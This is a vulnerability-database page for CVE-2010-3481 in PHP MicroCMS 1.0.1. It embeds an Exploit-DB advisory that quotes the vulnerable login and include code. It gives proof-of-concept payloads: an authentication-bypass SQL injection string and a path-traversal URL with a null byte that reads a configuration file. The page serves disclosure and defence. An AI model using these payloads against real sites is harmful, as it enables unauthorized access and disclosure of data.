CVE-2010-3481

medium

Published 2010-09-22 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

7.8

Description

Multiple SQL injection vulnerabilities in login.php in ApPHP PHP MicroCMS 1.0.1, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) user_name and (2) password variables, possibly related to include/classes/Login.php. NOTE: some of these details are obtained from third party information. NOTE: the password vector might not be vulnerable.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-15011 webapps php verified text · 3 KB

Abysssec · 2010-09-15

PHP microcms 1.0.1 - Multiple Vulnerabilities

text exploit Source: Exploit-DB

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-15-php-microcms-1-0-1-multiple-remote-vulnerabilities/

'''

 
Title  : PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Affected Version : PHP MicroCMS <= 1.0.1
Vendor  Site   : www.apphp.com/php-microcms/index.php
 
Discovery : abysssec.com
  
Description :
 
This CMS have many critical vulnerability that we refere to some of those here:
 
 
Vulnerabilites :

1. Authentication bypass with SQL Injection in login page:

user_name and password parameters recived from the login form are passed to do_login function:
login.php 
line 12-17:
	function Login() {
		$this->wrong_login = false;
		if (!$this->is_logged_in() && $_POST['submit'] == "Login" && !empty($_POST['user_name']) && !empty($_POST['password'])) $this->do_login($_POST['user_name'], $_POST['password']);
		else if ($_POST['submit_logout'] == "Logout") $this->do_logout();
		$this->accounts = new Profiles($GLOBALS['user_session']->get_session_variable("session_account_id"));
	}

in do_login function these parameters are passed to get_account_information function:
login.php line 19-29:
function do_login($user_name, $password, $do_redirect = true) {
		if ($account_information = $this->get_account_information($user_name, $password)) {
				$this->set_session_variables($account_information);
				if ($do_redirect) {
					header("Location: index.php\r\n\r\n");
					exit;
				}
		}else{
			$this->wrong_login = true;
		}
	}


then these parameters without any validation are applied in SQL query directly:
login.php line 48-55:
	function get_account_information($user_name, $password) {
		$sql = "SELECT ".DB_PREFIX."accounts.*, user_name AS account_name
							   FROM ".DB_PREFIX."accounts
							   WHERE
									user_name = '" . $user_name . "' AND 			// vulnerability here
									password = AES_ENCRYPT('" . $password . "', '" . DB_ENCRYPT_KEY . "')";	// vulnerability here
		return database_query($sql, DATA_ONLY, FIRST_ROW_ONLY);
	}

POC:
in login page enter:
username: a' or '1'='1
password: a' or '1'='1
----------------------------------------------------------------------------------------------------
2. Local File Inclusion:

index.php file line 21:
	$page = !empty($_GET['page']) ? $_GET['page'] : "home";

index.php file line 104,105:
					if (($page != "") && file_exists("page/" . $page . ".php")) {
						require("page/" . $page . ".php");	
poc:
http://localhost/microcms/index.php?page=../include/base.inc.php%00

Application impact

Vendor	Product	Versions	Fixed
apphp	php_microcms	`1.0.1`

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.